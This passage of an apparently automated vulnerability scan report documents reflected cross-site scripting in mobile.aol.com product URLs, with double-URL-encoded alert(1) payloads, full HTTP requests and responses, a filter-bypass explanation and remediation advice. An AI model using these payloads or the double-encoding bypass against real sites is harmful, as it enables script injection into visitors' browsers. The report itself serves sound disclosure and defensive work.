Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:45:52 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:45:52 GMT; path=/
Content-Type: text/html
Content-Length: 23718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'Androidcd897</script><script>alert(1)</script>5bc98c24ff1';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.108. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/Android/dailyfinance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbd7c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ee1b9a6005 was submitted in the REST URL parameter 3. This input was echoed as fbd7c</script><script>alert(1)</script>2ee1b9a6005 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/Android/dailyfinancefbd7c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ee1b9a6005/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:46:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:46:17 GMT; path=/
Content-Type: text/html
Content-Length: 23669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
d : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="Android";
   s_265.prop2="dailyfinancefbd7c</script><script>alert(1)</script>2ee1b9a6005";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.109. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/Autos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d5bb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8011fad6621 was submitted in the REST URL parameter 2. This input was echoed as 2d5bb</script><script>alert(1)</script>8011fad6621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone2d5bb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8011fad6621/Autos/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:21 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:21 GMT; path=/
Content-Type: text/html
Content-Length: 23696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone2d5bb</script><script>alert(1)</script>8011fad6621";
   s_265.prop2="Autos";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
...[SNIP]...

5.110. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/Autos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3dbb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e554b60a6c64 was submitted in the REST URL parameter 2. This input was echoed as e3dbb</script><script>alert(1)</script>554b60a6c64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhonee3dbb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e554b60a6c64/Autos/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:37 GMT; path=/
Content-Type: text/html
Content-Length: 23696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhonee3dbb</script><script>alert(1)</script>554b60a6c64';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.111. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/Autos/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3d0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef200d36df9f was submitted in the REST URL parameter 3. This input was echoed as 9d3d0</script><script>alert(1)</script>f200d36df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/Autos9d3d0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef200d36df9f/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:02 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:02 GMT; path=/
Content-Type: text/html
Content-Length: 23645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
Name="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="Autos9d3d0</script><script>alert(1)</script>f200d36df9f";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.112. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aim/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88bf2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a90bdd3ac8 was submitted in the REST URL parameter 2. This input was echoed as 88bf2</script><script>alert(1)</script>4a90bdd3ac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone88bf2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a90bdd3ac8/aim/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:09 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:09 GMT; path=/
Content-Type: text/html
Content-Length: 23688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone88bf2</script><script>alert(1)</script>4a90bdd3ac8";
   s_265.prop2="aim";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   
...[SNIP]...

5.113. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aim/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92eb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87274d846fd was submitted in the REST URL parameter 2. This input was echoed as d92eb</script><script>alert(1)</script>87274d846fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoned92eb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87274d846fd/aim/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:24 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:24 GMT; path=/
Content-Type: text/html
Content-Length: 23690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoned92eb</script><script>alert(1)</script>87274d846fd';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.114. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aim/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3c0e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2d4fca6251 was submitted in the REST URL parameter 3. This input was echoed as a3c0e</script><script>alert(1)</script>f2d4fca6251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/aima3c0e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2d4fca6251/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:49 GMT; path=/
Content-Type: text/html
Content-Length: 23639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
geName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="aima3c0e</script><script>alert(1)</script>f2d4fca6251";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.115. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a75%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee73e678bbd was submitted in the REST URL parameter 2. This input was echoed as 85a75</script><script>alert(1)</script>ee73e678bbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone85a75%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee73e678bbd/aol-radio/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:30 GMT; path=/
Content-Type: text/html
Content-Length: 23708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone85a75</script><script>alert(1)</script>ee73e678bbd';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.116. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed1ec%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e16f4afc7846 was submitted in the REST URL parameter 2. This input was echoed as ed1ec</script><script>alert(1)</script>16f4afc7846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneed1ec%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e16f4afc7846/aol-radio/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
